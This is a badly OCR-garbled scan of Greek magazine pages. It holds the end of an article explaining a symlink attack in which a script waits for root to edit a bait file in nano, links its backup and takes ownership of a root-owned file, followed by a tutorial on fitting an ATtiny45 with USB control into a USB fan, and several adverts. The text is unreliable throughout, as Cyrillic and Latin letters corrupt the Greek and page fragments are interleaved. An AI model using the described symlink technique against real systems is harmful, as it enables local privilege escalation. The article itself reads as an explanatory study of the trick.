συνθήκη επανάληψης σχετίζεται µε τον κατάλογο στον onoio βρἰ- 
σκεται το αρχεἰο δόλωμα. Συγκεκριμένα, το πρὀγραμμα ελέγχει τα 
περιεχόμενα του καταλόγου και επαναλαμβάνει το βρὀχο μέχρι να 
δημιουργηθεἰ va αρχείο backup. Auró το αρχείο θα δηµιουργηθεἰ 
αυτόματα апо ro πρὀγραμμἁ µας, την κατάλληλη χρονικἡ στιγµή. 
Όταν συμβεἰ auró η επίθεση θα xei ολοκληρωθεί, οπότε o βρὀχος 
θα πάψει να επαναλαμβάνεται και το πρὀγραμμα θα reppariorei. 


Γραμμές 26-30: Μέσα στο βρὀχο πραγματοποιείται архика £vag 
ἐλεγχος: Το проуранна εκτελεἰ ro ps aux | grep nano κι ελέγχει 
αν η ἐξοδος αυτών των εντολὠν περιλαμβάνει то root.*nano.*$file. 
Αν εντοπιστεἰ το συγκεκριµένο string, ο χρήστης root ἐχει ανοίξει 
το αρχεἰο δόλωμα! Έτσι, στη γραμμὴ 33 то πρὀγραµμµμα επιχειρεὶ va 
δημιουργήσει το κατάλληλο symbolic link. 


Γραμμές 35-38: Εδὠ το πρόγραμμα ελέγχει αν δημιουργήθηκε ro 
symlink. Αν ναι, τυπώνεται va μήνυμα επιτυχἰας ка! то проуранра 
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περιμένει τη στιγµἠ nou ο root θα αποθηκεύσει το αρχείο. Αν η 
δηµιουργία του symbolic link δεν πέτυχε, το проуранна τερματίζει. 


ο Γραμμὲς 37-42: Катахорята! στη $main::root file η ἐξοδος της 
εντολἠς Is -I /var/root-file. Αμέσως μετὰ, το проуранра ελέγχει av 
η $main::root file περιέχει ro string "root root" ἡ ὀχι. Αν Ἔδεντ 
βρεθεί το συγκεκριμένο string, o ιδιοκτήτης και то group του 
αρχείου ἐχουν αλλάξει. Αυτό σηµαίνει от! o root αποθήκευσε то 
αρχείο ка! то nano ἄλλαξε τα δικαιώματά του. Το root-file ανήκει 
πλέον στον επιτιθἐµενο! Στην περίπτωση nou βρεθεί то string "root 
root", та δικαιώματα του αρχείου δεν xouv αλλάξει ακόµα. Έτσι, 
το проуранна συνεχίζει τους ελέγχους του και δεν τερματίζει akó- 
μα... 


Επίλογος 


Σε αυτὸ το ар@ро εξετἁσαµε ёха παράδειγµα επίθεσης συμβολικὠν ouv- 
δέσεων. Βέβαια, εμεἰς υποθέσαµε οτι o root ξεγελάστηκε, от! η ἐκδοση 
TOU nano ἦταν пала ка! от! τα αυτόματα backup ἦταν ενεργοποιημένα. 
Αυτὲς οι προὐποθέσεις μειώνουν ӧраратіка τις πιθανότητες επιτυχίας της 
επίθεσης. Ωστόσο υπάρχουν πολλά προγράµµατα τα οποία δημιουργούν 
--ανεξέλεγκτα-- npocopivà αρχεία. Επίσης, υπάρχουν αρκετὲς =фарро- 
үёс̧, οι οποἰες ката διαστήματα αναβαθμἰζουν τη δικαιοδοσία τους για va 
ολοκληρώσουν ορισμένες εργασἰες. Με λίγα λόγια, av ка! η επίθεση που 
περιγράψαμε ανακαλύφθηκε πολύ пала, κανεὶς δεν μπορεί να αποκλείσει 
την επἀνοδὸ της στο προσκήνιο. Αλλά ακόµη κι αν αυτό δεν συμβεὶ ποτὲ, 
εμεὶς εἱμαστε ἠδη κερδισμένοι: Μελετήσαμε ἑνα ακόµα ευρηματικὀ και 
ευφυέστατο τέχνασμα. 


еее. κ”. "el 
ΠΤ IS ГОРЕ δι 
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Όπως ακριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


У έτσι θέλουμε να 
μοιραστούμε και 

— τις Ιδέες µας] 

hack Γιατί λοιπόν να 
ας егѕрасе.ог μην To κάνουμε 
Αμπατιέλου 11, Αθήνα Ф Е 
πλησίον ΗΣΑΠ Ау. Ελευθέριος QTO κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hackathons 
Awmn  SoftworeFreedomDay 


OpenLibrary  MozilloGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenDota Aeroponics үру 

CreotiveCommons 


Μάθε περισσότερα για To hsor, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: роса сосе шу 


Βάλπε, μυσιλό, 
στον ανεµισπήραι 


Jart j 


Παρόμοιο ανεμι- 
στήρα βάλαμε και 
εμείς στο μάτι. 
Μπορούμε va 
χρησιμοποιήσου- 
µε οποιονδήποτε 
θέλουμε, αρκεί 
να τροφοδοτείται 
µέσω της 0ú- 

ρας USB. 
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Πριν απὀ μερικὰ χρόνια, ο γράφων δέχτηκε борак vav ανεμιστήρα 
USB. О ανεμιστήρας κάνει άψογα την δουλειά του ακόμα και σήμερα, 
αλλά опос τα περισσότερα USB gadgets δεν γίνεται αντιληπτὸς anó то 
λειτουργικὀ σύστημα του υπολογιστἠ. Το μόνο που κάνει εἶναι να τραβάει 
ρεύμα апо τη θύρα USB και να λειτουργεὶ αδιάκοπα, μέχρι να πατήσει 
κάποιος τον ενσωματωμένο διακόπτη (ἡ να τραβήξει το καλώδιο anó τη 
θύρα). Με τη βοήθεια ενὸς κατσαβιδιού και μετά апо µια σύντομη ἐρευ- 
να, ανακάλυψε ο γράφων от! ο ανεμιστήρας ἐχει υπεραρκετὀ χώρο στο 
εσωτερικό TOU για την προσθήκη ηλεκτρονικὠν. Κάπως ἐτσι ἄρχισαν να 
περνάνε διάφορες ιδέες anó то μυαλό. О ανεμιστήρας εἶναι εντελώς Xa- 
ζὸς και θα ἦταν ενδιαφέρον αν εἶχε κάποιο εἶδος ευφυῖας! Δεν θα "χε πλά- 
κα αν εμφανιζόταν ως συσκευἠ του συστήματος και υπήρχε δυνατότητα 
ελέγχου µέσω κάποιου προγράμματος; 


Σ' αυτὀ το εγχείρημα δεν θα βασιστούµε στο Arduino. Н πλατφόρμα δεν 
θ' αποτελεἰ rov πρωταγωνιστἠ της κατασκευἠς µας, οὐτε θα τη δεσμεύ- 
σουµε για τον ἐλεγχο του ανεμιστήρα. Αντίθετα, θα χρησιμοποιήσουμε 
το Arduino ελάχιστα και µόνο σε ἑνα στάδιο της κατασκευἠς. Όλα αυτά, 
βέβαια, θα τα δούμε αναλυτικἁ στη συνέχεια. Па την opa, μπορούμε v' 
αρχίσουμε αμέσως µε τη συλλογή του anapairnrou hardware... 


Οι πρωταγωνιστές 


Το κυριότερο εξάρτημα στην κατασκευή θα εἶναι 
ἑνας μικροελεγκτἠς AVR της σειρἁς ATtiny. Αυτοί 
οι μικροελεγκτὲς ἐχουν σαφώς περιορισμένες 
δυνατότητες σε σχέση µε εκεἰνους της σειρὰς 
ATmega και, κατ' επἐκταση, σε σχέση µε τον 
επεξεργαστὴ rou Arduino. Ωστόσο, AUTÒ то 
μικρὸ (σε δυνατότητες αλλά και σε μέγε- 
θος) τσιπάκι упорі να λειτουργήσει άνετα 
ως "εγκέφαλος" ενὸς ανεμιστήρα. Πέρα 
απὀ τον επεξεργαστή θα χρειαστούμε 
μερικὰ ακόµα εξαρτήματα, για τη 
διασύνδεση του τσιπ µε τον ανε- 
шотйра και φυσικὰ µε τον ипо- 
λογιστἠ. Αυτὲς οι διασυνδέσεις 
αποτελούν δυο πολύ μικρὰ 
αλλά διαφορετικἁ κυκλώμα- 
τα, τα οποία да εξετάσουμε 
αναλυτικἀ στη συνέχεια. 
Па την ора θα πούμε μόνο 
δυο λόγια για το λόγο 
ὑπαρξης του καθε- 
νὸς. 


Ἕνας ανεμι- 

στήρας, ògo 

μικρὸς κι αν 

εἶναι, τραβά- 

ει πολὺ περισ- 
σότερο ρεύμα anó 
αυτὸ που µπορεί va 

δώσει ἑνας μικροελεγκτὴς. 
Па παράδειγµα, ο δικὸς рас 
ανεμιστήρας órav λειτουργεὶ 
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στα 5V τραβάει 200mA. Ωστόσο („а 

οι ακροδέκτες των μικροελεγκτών | є > с ti болади 
της οικογένειας AVR μπορούν ма | sourcegorge — 
δώσουν (ἡ va τραβήξουν) μόλις 
40mA. Ἔτσι, για τον ἐλεγχο του 
ανεμιστήρα апо τον επεξεργαστή 
απαιτείται η μεσολάβηση ενὸς δι- 
ακὀπτη. Η κατάσταση αυτού TOU | 
διακόπτη πρέπει ν' αλλάζει εὐκο- 
λα (µε μικρὲς τάσεις και ρεύματα), | 
ενώ ο ἰδιος πρέπει va 'vai σε θέση 


WINAVR м. arcanum. joerg wunsch, sprintersb. 
Summary Files Reviews Support Develop  HostedApps Собе 


|. Looking for the latest version? Download WinAVR-20100110-install.exe (23.8 MB) 


| Home / WinAVR 

| 

| Names Modifiede Size $ 
Ф Parentfolder 


.. 20100110 2010-01-20 


* n А ш 20090313 2009-03-14 
va ελέγξει oxerikü μεγάλα φορ- "T 20084206 
та (μεγάλες τάσεις και ρεύματα). Em 20080612 
Στη θέση αυτού TOU διακόπτη θα πα 20000512 2008-05-12 
χρησιμοποιήσουμε ἑνα κατάλληλο 5 200001 20080430 

Н πα 20071221 2007-12-21 
TOdvgio Top: | τ 20070525 2007-05-25 
Οι επεξεργαστὲς της σειράς ATtiny, m 20070122 207123 


όπως пара noAAoi AVR, δεν διαθέ- | mwm 
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TOUV κύκλωμα USB. Αυτό συνεπά- 
γετα! от! πρέπει va υλοποιήσουμε το σχετικὀ πρωτόκολλο επικοινωνἰας 
στο Software. Ευτυχώς кат! τέτοιο μπορεὶ να γίνει πολὺ εὐκολα, µε τη 
βοήθεια της βιβλιοθήκης V-USB. Πα va 'µαστε ειλικρινείς, η συγκεκρι- 
μένη βιβλιοθήκη μάς απαλλάσσει πλήρως ап' αυτόν το μπελά. Ωστόσο 
η απουσία κυκλώματος USB апо τον επεξεργαστή συνεπάγεται και кат! 
ακόμα: О επεξεργαστής δεν µπορεί va δημιουργεὶ πάντα σήματα στα 
3.3V, σαν αυτά nou απαιτεἰ ο δίαυλος USB για τη μεταφορὰ δεδομένων. 
Αναρωτιέστε τι εννοούμε μ' αυτό το "πάντα"; Τα ψηφιακά σήματα του 
τσιπ βρίσκονται πάντα (χωρίς εισαγωγικἁ) στην ἰδια στάθμη µε την τάση 
τροφοδοσίας του. Έτσι, órav τροφοδοτούµε το τσιπ µε 3.3V, ra ойрата 
TOU βρίσκονται στα 3.3V. Αντίστοιχα, отау τροφοδοτούµε то τσιπ µε 5V, 
τα σἠματά του βρίσκονται στα 5V. Στη ёк µας περίπτωση о µικροελε- 
уктйс θα τροφοδοτείται апо τις γραμμὲς τροφοδοσίας του διαύλου USB, 
οι οποίες προσφέρουν 5V. Έτσι, τα ойрата του *б=\* θα βρίσκονται στη 
στάθμη nou απαιτεἰ ο δίαυλος USB για την επικοινωνία. AUTÒ то ζητηµα- 
так! λύνεται µε δύο διόδους zener, οι οποἰες θα ψαλιδίζουν την τάση των 
σημάτων. 


Ліста αγορών 


Μαζὶ µε та παραπάνω да χρειαστούμµε και реріка ακόµα εξαρτήματα. Na- 
ρακάτω φαίνεται µια πλήρης Ліота µε όλα боа χρειάζονται για την KaTa- 
σκευἠ µας: 

ο ἑνας ανεμιστήρας USB 

ο μικροελεγκτἠς ATtiny45 (ATTINYA45-20PU) 

ο τρανζίστορ ισχύος TIP120 

ο ηλεκτρολυτικὀς πυκνωτής 1рЕ 

ο ηλεκτρολυτικὸς πυκνωτὴἠς 10рЕ 

e δίοδος ανόρθωσης 1N4001 

ο δύο αντιστάσεις 68Ω (blue-gray-black-gold) 

ο µια αντίσταση 2.2ΚΩ (red-red-red-gold) 

ο δύο δίοδοι zener ота 3.6\ (0.5 watt) 
Ὅπως ауафёранЕ νωρίτερα, о μικροελεγκτἠς που διαλέξαμε αποτελεἰ 


Η τελευταία ἐκδο- 
ση του πακέτου 
WinAVR εἶναι σχε- 
доу δύο χρονών. 
Μην ανησυχείτε 
όμως, το πακέτο 
συντηρείται/ανα- 
βαθμίζεται ακόµη... 
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Αυτή την φορά δεν 
θα χρησιμοποιή- 
coupe то Arduino 
ως βάση της kara- 
σκευής, αλλά ως 
éva εργαλείο για 
την ολοκλήρωσή 
της! 


О ανεμιστήρας 
περιμένει TO 
εμφύτευμα! Δεν 
ήταν δύσκολο να 
φτάσουμε στο 
μοτέρ. Μόνον ἐξι 
βίδες χρειάστηκε 
v' αφαιρεθούν... 
Τώρα που το σκε- 
πτόμαστε, ἐξι βίδες 
δεν εἰναι και λίγες. 


Η υλοποίηση του 
κυκλώματος σε 
breadboard. Στα 
δεξιά του шкро- 
ελεγκτή ATtiny 
υπἀρχει TO κύκλω- 
μα για την επικοι- 
vovia USB. Ακόμα 
παραπέρα φαίνεται 
το τρανζίστορ σε 
ρόλο διακόπτη που 
ελέγχει τον ανεμι- 
στήρα. 


О ανεμιστήρας 
μαζί µε τον κινη- 
τήρα του ка! TO 
πλαστικὀ που τον 
κρατάει στη βάση. 
Πα τις δοκιμές µας 
κόψαμε ra калоба 
TOU και συνδέσαμε 
κροκοδειλάκια, 
ώστε να κάνουμε 
την ζωή µας EUKO- 
λότερη... 
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μέλος της σειράς ATtiny. Στη Ai- 
στα µε τα εξαρτήματα αναφέρου- 
НЕ τον ATtiny45, αλλά θα μπορού- 
σε να χρησιμοποιηθεἰὶ άνετα και ο 
ATtiny85 -- χωρὶς κάποια αλλαγἠ 
στο κύκλωμα ἡ στον κὠδικα. Η 
μόνη διαφορὰ μεταξύ των Тту45 
και Тту85 αφορά στο μέγεθος 
της ενσωματωμένης μνήμης flash 
(4ΚΒ για rov прото και 8KB για τον 
δεύτερο). Πάντως ro πρὀγραμμα 
που θα γράψουμε εἶναι αρκετά μι- 
кро και ката паса πιθανότητα да 
χωρούσε και στον Тту25, µε pò- 
λις 2ΚΒ flash. Επομένως, αν σας 
βρίσκεται κάπου µην σπεύσετε va 
αγοράσετε rov 45άρη. 


Το τρανζίστορ που προτείνουμε 
εἶναι арк=та ισχυρὀ για τη συ- 
γκεκριµένη κατασκευὴ. Σκεφτείτε 
от! µπορεί να "σηκώσει" μέχρι και 
5A στα 60V! О χειρισμός του та- 
πεινοὐ ανεμιστήρα µας αποτελεὶ 
αστεία υπόθεση yia ro TIP120. 
Ωστόσο проката! yia va фтпуб 
τρανζίστορ, ro onoio xpnoiponoiei- 
ται полу συχνὰ σε κυκλώματα µε 
μοτέρ και σε διάφορες κατασκευές 
НЕ το Arduino. Επομένως, μερικὰ 
τέτοια τρανζίστορ θα αποτελέσουν 
καλἠ προσθήκη στο о=так! των 
εξαρτημάτων σας. Τέλος, ἐχετε 
υπόψη от! θα ἦταν προτιμότερο va 
αγοράσετε το τρανζίστορ και τον 
επεξεργαστή απὀ το ebay, καθώς 
θα τα βρείτε σε «πολῦξ χαμηλές 
τιμές. 'Oco για τα υπόλοιπα εξαρ- 
τήματα, εἶναι τόσο φτηνά nou θα 
μπορέσετε να τα αγοράσετε óÀa µε 
192 ευρώ απὸ οποιοδήποτε KaT- 
στηµα ηλεκτρονικὠν εξαρτημάτων. 


Περιβάλλον ανάπτυξης 


Ὅπως εἰπαμε παραπάνω, αυτή 
τη Фора δεν θα στηριχτούμε 
στο Arduino -- τουλάχιστον ох! 
αποκλειστικἀ. Па την ανάπτυξη λοιπὸν του προγρἀμματὸς µας για τον 
ATtiny45, θα χρειαστούµε το κατάλληλο tool chain. Με απλά λόγια, θα 
χρειαστούμε ¿vav compiler, ¿va εργαλείο σαν ro make, vav linker κι OTI- 
δήποτε ἆλλο απαιτείται για να μετατραπεὶ o κὠδικάς µας σε кат! που θα 
καταλαβαίνει ro τσιπάκι. Па τους χρήστες Windows ола τα σχετικἁ εργα- 
λεία περιλαμβάνονται στη δωρεὰν εφαρµογἠ WinAVR!, την οποία παρέχει 


1. Διαβάζεται "γουενέβερ". Μη ρωτάτε γιατί. 
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η κατασκευάστρια εταιρεἰα του μικροελεγκτἠ рас (ATMEL). Συγκεκριμέ- 
να, το εν λὀγω проуранна αποτελεἰ ¿va ολοκληρωμένο περιβἆλλον ανά- 
πτυξης που συνοδεύεται апо μία ειδικἠ ἐκδοση του μεταγλωττιστή ССС 
για τους επεξεργαστές AVR, καθώς κι апо алла απαραίτητα εργαλεία. 
Οι χρήστες Linux μπορούν να εγκαταστήσουν τα απαιτούμενα εργαλεία, 
δίνοντας кат! τέτοιο (το παράδειγµα апо Ubuntu): 


sudo apt-get install build-essential gcc-avr avr-libc avrdude 


To περιβάλλον rou WinAVR περιλαμβάνει κι ἑναν editor yia τη συγγραφἠ 
TOU κὠδικα. Εμεὶς όμως протшанЕ τις απλούστερες και καθαρότερες AÙ- 
σεις. П' auró προτείνουμε ка! σ' εσάς να κατεβάσετε και va εγκαταστή- 
σετε το Notepad++ (http://notepad-plus-plus.org). Πρόκειται για ἑναν 
ελαφρύ και ταχύτατο text editor που υποστηρίζει (фиска) πολλὲς картё- 
λες, προσφέρει syntax highlighting (αλλά δεν το επιβάλλει) και παρέχει 
δεκάδες ακόμα ευκολίες (Σ.τ.Ε. Ζω yia τη μέρα που κάποιος θα γράψει 
"δεκατριάδες". ХоВара μιλάω.) Па τους χρήστες rou Linux δεν χρειάζεται 
να πούμε τίποτα. Στο Linux υπάρχουν δεκάδες text editors και πολλοὶ апо 
αυτούς θα συγκρίνονταν ávera µε ro Моќерааа+ +, για va µην πούμε ὁτι 
εἶναι και καλύτεροι! Κλασσικό παράδειγµα αποτελεί o Gedit. 


Апо то РС στο τσιπ 


Πλέον, το μόνο που χρειαζόμαστε =ктос апо ὀρεξη εἶναι ἑνας hardware 
programmer. Αναφερόµμαστε στη συσκευἠ που επιτρέπει τη μεταφορὰ 
των προγραμμάτων рас апо τον υπολογιστή στο τσιπάκι. Στην αγορά δι- 
ατἰθενται пара πολλοί hardware programmers και о! πιο δημοφιλείς εἶναι 
εκεἰνοιπου προσφέρουν το λεγόμενο In-Circuit Serial Programming (ICSP 
ἡ σκέτο ISP). Με µια απλἠ αναζήτηση oro eBay yia "AVR programmer", 
θα βρείτε пара πολλὲς υλοποιήσεις σε τιμὲς που да ξεκινούν апо 3€! 
Πάντως, yia ὁσους διαθέτουν Arduino υπάρχει ша πολύ καλὴ κι εντελὼς 
δωρεάν λύση. О λόγος γίνεται yia ἑνα sketch που συνοδεύει το Arduino 
IDE και το onoio μετατρέπει την αγαπημένη µας πλατφόρμα о" ¿vav ISP 
programmer. Επομένως, yia va αποκτἠσουµε γρήγορα και χωρίς ἐξοδα 
£vav programmer, арк=! va φορτώσουμε то σχετικὀ sketch (ονομάζεται 
"Arduino ISP" και βρίσκεται στη λίστα µε та παραδείγματα που ενσω- 
ματώνει то IDE) στο Arduino µας. Πλέον, μπορούμε να εστιάσουµε στο 
hardware rou programmer µας. To πῶς θα συνδεθεἰ ro Arduino µε то 
τσιπάκι µας θα το δούμε αργότερα, pai µε το υπόλοιπο κύκλωμα της 
κατασκευἠς. Πα την opa арк=! µόνο µια μικρἠ προσθήκη, επάνω στην 
πλακέτα του Arduino. Συγκεκριµένα, πρέπει να συνδέσουµε τον πυκνω- 
τὴ των 10µΕ στο RESET και στο GND. Εδὠ χρειάζεται λίγη προσοχή: Н 
πλευρά του πυκνωτή µε την ἄσπρη γραμμὴ πρέπει να συνδεθεί στο GND! 
Βλέπετε, ο πυκνωτὴς µας εἶναι ηλεκτρολυτικὸς και AUTÒ, μεταξύ ἄλλων, 
σημαίνει от! ἐχει συγκεκριμένη πολικότητα. Αν δεν τη σεβαστούμε то πιο 
πιθανὸ εἶναι να ακούσουμε va "μπαμ" (κυριολεκτικά) και ο πυκνωτής 
va εξαὔλωθεί, να πάρει φωτιά ἡ апла να ανοἰξει στα δύο. Όλα αυτά ev- 
δέχεται να ακούγονται συναρπαστικἁ αλλά δεν εἶναι -- τουλάχιστον ох! 
πάντα ;) 


Το κύκλωμα 


Έφτασε η opa να χτίσουμε то κύκλωμα της κατασκευἠς µας. Ως βάση θα 
χρησιμοποιήσουμε ἑνα breadboard, ενὠ да χρειαστούμε και μερικἁ KA- 
λωδιάκια σύνδεσης. Ὅσοι διαθέτουν Arduino εἶναι σίγουρο от! διαθέτουν 
κι апо τα δύο (σε αφθονία). Όπως θα διαπιστώσετε και μόνοι σας, TO KÙ- 


WV'HAGIKER 
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кЛора δεν εἶναι καθόλου першлоко. Ωστόσο για va µην xåvoupe ατελεἰ- 
ωτες ὧρες κάνοντας debugging, θα ἦταν φρὀνιµο va εἶμαστε προσεκτικοἰ 
ката τη συνδεσμολογἱα των εξαρτημάτων. Το κύκλωμα да μπορούσε να 
χωριστεί σε τἐσσερα επιµέρους τμήματα και στη συνέχεια θα εξετάσουμε 
το καθένα ξεχωριστά. 


1. Τροφοδοσία και επεξεργαστής (εικὀνα Α): Ο μικροελεγκτἠς δεν 
απαιτεἰ σχεδόν κανένα εξωτερικὀ 
εξάρτημα yia τη λειτουργία του. 
Δεν χρειάζεται οὐτε καν κάποιο 
κρύσταλλο. Па το χρονισμὸ του 
επεξεργαστἠ µας θα στηριχτούμε 
σε ειδικὀ κύκλωμα που φέρει και 
του οποίου τη ρύθμιση θα δούμε 
αργότερα (ката rov προγραμματι- 
[ED rm EEG m rus сно του τσιπ). Па την opa, аркі 
va συνδέσουμε την τροφοδοσία 
του τσιπ (τα 5\ στο рт 8, και τα 
OV στο рт 4) και µια αντίσταση των 10ΚΩ, μεταξύ των 5V και του рт 
1, Έχετε υπόψη σας от! η αρίθµηση των ακροδεκτώὠν σηματοδοτείται 
anó µια µικρή κουκἰδα ἡ µια coox (rj και τα δύο) στο πάνω μέρος 
της συσκευασίας rou τσιπ. Αυτὀ το σημαδάκι βρίσκεται δίπλα στον 
ακροδέκτη 1, ενώ η αρίθμηση των υπολοίπων γίνεται ката τη θετικἠ 
φορὰ (αντίθετα апо τους δείκτες του ρολογιού). Τέλος, να πούμε ὁτι η 
αντίσταση που ξεκινά апо 5V και καταλήγει στον ακροδέκτη 1 (акро- 
δέκτης reset) αποτρέπει то τσιπ апо το να κάνει reset. Αν η αντίσταση 
ἧταν συνδεδεμένη στο GND, ο επεξεργαστής θα βρισκόταν μονίμως 
σε κατάσταση reset και δεν да λειτουργούσε. Πριν προχωρήσουμε 
πρέπει va συνδέουµε και τον πυκνωτή του 1µΕ, ανάμεσα στα 5V και 
στο GND. Εδὠ θα χρειαστεί και πάλι προσοχἠ, ώστε να µην τον ouv- 
δέσουµε ανάποδα (η πλευρά µε тп λευκἡ γραμμὴ συνδέεται στο GND). 
О πυκνωτής τοποθετείται προκειµένου να φιλτράρει τον ηλεκτρικὀ 
θόρυβο nou θα παράγουν τα πηνἰα του κινητήρα του ανεμιστήρα. 


κει κεν... reje τσ στ τσ στ 
tt tt seses ser more m ser 


οσον 


2. Σύνδεση USB (εικόνα B): Tov ακριβἠ τρόπο σύνδεσης του καλωδίου 
USB θα τον δούμε στο deltaHacker 
| 011. Тора θα περιοριστούμε στο 
απαραίτητο κύκλωμα, γύρω απὀ 
TOV µικροελεγκτἠ. Па τη σύνδεση 
στο δίαυλο USB, λοιπὸν, πρέπει να 
συνδέσουµε δύο αντιστάσεις των 
68Ω, στους ακροδέκτες 6 και 7. 
Αυτές о! αντιστάσεις θα καταλἠ- 
ΕΗ НЫЕ E:  UHEHH HHH γουν στο καλώδιο USB. Επιπλέον, 
στο σημείο σύνδεσης των αντιστά- 
σεων µε ТО καλώδιο θα πρέπει να συνδεθούν και οι δίοδοι zener. Την 
ακριβἠ συνδεσμολογἰα да τη δείτε στην εικὀνα. О! δίοδοι αυτὲς ya- 
λιδίζουν την τάση των ψηφιακών εξόδων του επεξεργαστή, ὥστε va 
την προσαρµόσουν στα επίπεδα που απαιτούνται για την επικοινωνία 

μέσω USB. 


3. Έλεγχος ανεμιστήρα (εικόνα Г): Тора μπορούμε να προσθέσουµε 
το σημαντικότερο εξάρτημα: Το μοτὲρ του ανεμιστήρα! Ακριβώς уг 
αυτὀ δεν φτάσαμε ως εδώ; Βέβαια то ротёр δεν да συνδεθεἰ απευθείας 
πάνω στο τσιπάκι µας. Όπως εἶπαμε νωρίτερα, σε αυτή τη σύνδεση θα 
μεσολαβήσει το τρανζίστορ σε ρὀλο διακόπτη. О πρὠτος ακροδέκτης 


96 


Βάλτε μυαλό στον ανεμιστήρα (part 
ПИ 


απὀ τ' αριστερά апотЕЛ= τη 
βάση του τρανζίστορ και στην 
ουσία αποτελεἰ τον ακροδέκτη 
μέσω του οποίου ελέγχουμε 
την κατάσταση του τρανζίστορ. 
Αυτός ο ακροδέκτης, λοιπὸν, θα 
συνδεθεἰ στο рт 2 rou ATtiny. 


О τρίτος ακροδέκτης του τραν- 
ζἰστορ (тёрра δεξιὰ) αποτελεί 
τον λεγόμενο "εκπομπό" και θα 
πρέπει να συνδεθεἰ στο GND. 
Τέλος, στον μεσαὶο ακροδέκτη 


(ονομάζεται "συλλέκτης") θα 


я + й CES 
we ot nnm 


συνδἑέσουµε το ἑνα апо та δύο 
καλωδιάκια του μοτὲρ. Το ἆλλο 
πρέπει να συνδεθεί στα +5\. 


4. Προγραμματισμὀς τσιπ (εικὀνα A): Σε αυτὀ το στάδιο, το κὐκλωμά 
μας εἶναι ουσιαστικά ἐτοιμο. Ωστόσο πρέπει να κάνουμε μερικὲς akó- 
μα συνδέσεις, για τον προγραμματισμὀ TOU μµικροελεγκτἠ. Αυτές οι 
συνδέσεις δεν θα εἶναι μόνιμες κι órav αργότερα προγραμματίσουμε 
το топак! και βεβαιωθούμε от! λειτουργεί σωστά, θα μπορούμε va 
τις απομακρύνουμε. Н διασύνδεση rou Arduino µας µε rov ATtiny ne- 
ριλαμβάνει τέσσερα καλωδιάκια για τη μεταφορὰ των δεδομένων κι 
алла δύο για τη γεφύρωση της τροφοδοσίας, μεταξύ rou breadboard 
και τους Arduino. 


To επὀµενο βήμα 


Για την opa έχουμε ετοιμάσει ολόκληρο то hardware. Στο επόμενο άρθρο 
θα γράψουμε το προγραμματάκι που θα εκτελείται στον ATtiny και θα 
εξετάσουμε ша аплй εφαρµογἠ της βιβλιοθήκης V-USB. Στη συνέχεια θα 
μεταγλωττίσουμε το πρὀγραμμὰ µας ка! θα το μεταφέρουμε στο τσιπάκι, 
НЕ τη βοήθεια ενός ειδικού προγράµµατος (avrdude) και του Arduino σε 
ρόλο programmer. Τέλος, θα βάλουμε τον ανεμιστήρα µας σε λειτουρ- 
yia και θα αρχίσουμε να παΐζουμε μαζί rou -- αλλά апо τον υπολογιστή! 
Βέβαια, θα ἐλεγε κανεὶς от! µε τόση ζέστη δεν θα τον σβήνουμε ποτὲ. 
Ωστόσο, ὀταν φεύγουμε апо το РС δεν υπάρχει κανένας λόγος να λει- 
τουργεἰ ο ανεμιστήρας κι auro εἶναι кат! που δεν χρειάζεται να γίνεται µε 
χειροκίνητους διακόπτες... ;) 


Εσεἰς μάθατε για την προσφορά Summer 2012;! 


Μετά την απίστευτη υποδοχή nou γνώρισε n προσφορά 
Ιουνίου, κι ἐπειτα апо την κλήρωση 5 συνδρομών εφ ópou ζωὴς σε 


5 τυχερούς αναγνώστες, επεκτείνουµε την προσφορὰ για όλο TO 
καλοκαίρι! 


Αγοράστε ropa µια 12µηνη ἡ 24unvn συνδρομή στο 
deltaHacker ἡ προσθέστε στη συνδρομή που έχετε ἄλλη µια 


12Ζµηνη ἡ 24µηνη συνδρομὴ, και αποκτήστε αυτόματα 5% 
εκπτωση eni της κανονικἠς τιμής! 


Επιπλέον, 000! επιλέξετε 24µηνη συνδρομή μπαίνετε 
και σε κλήρωση nou θα γίνει στις 31/8/2012, για πέντε (5) 


συνδρομές εφ’ ὁρου ζωής! 


Ναι, σωστὰ διαβάσατε: О! πέντε ruxyepoi που θα κληρωθούν θα 


παίρνουν το περιοδικὀ VI а П ἄντα | 


Па va εκµεταλλευτείτε την προσφορά Summer 2012 αγοράστε την 


12unvn n 24unvn cuvópour| σας έως και τις 26/8/2012, 
συμπληρώνοντας τη φόρμα παραγγελιών στο 


http://deltahacker.gr/order 


Προσοχή: ακολουθούν ψιλά γράμματα! 


Н ἐκπτωση του 5% και η κλήρωση για τις πέντε cuvópopég εφ’ órou ζωής, ισχύουν μόνον για ὁσους αγοράσουν 12рпуп ἡ 
24unvn συνδρομὴ έως kai τις 26/8/2012. 


Н διαφήμισή σας θα 
μπορούσε va εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν εἶναι. 


Προς το παρόν. 


пус рим сущие: ΞΕΡΟυΜΕ ει ξΕΡΕΤΕ ως 
ξε DOULIE «. ξέρετε « wee va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2usQdeltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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HOTDOC. 


Ένα περιοδικό από τον Κώστα Βαξεβάνη 


Η | όπως είναι Р 
H όπως πρέπει να είναι 


Θα φάτε καλά! 


Αυτοσκοπός µας δεν είναι να προκαλέσουµε 
Προκλητικά είναι αυτά που συμβαίνουν γύρω µας 
Εμείς та καταγράφουµε 


Στην Ελλάδα υπάρχει χώρος για σκέψη 
Υπάρχουν άνθρωποι µε ανησυχίες και 
0’ αυτούς απευθυνόµαστε 


ΓΙΝΕΤΕ ΣΥΝΔΡΟΜΗΤΕΣ 


Επικοινωνία: T 210 69 85 050 Е hotdocum(2gmail.com 


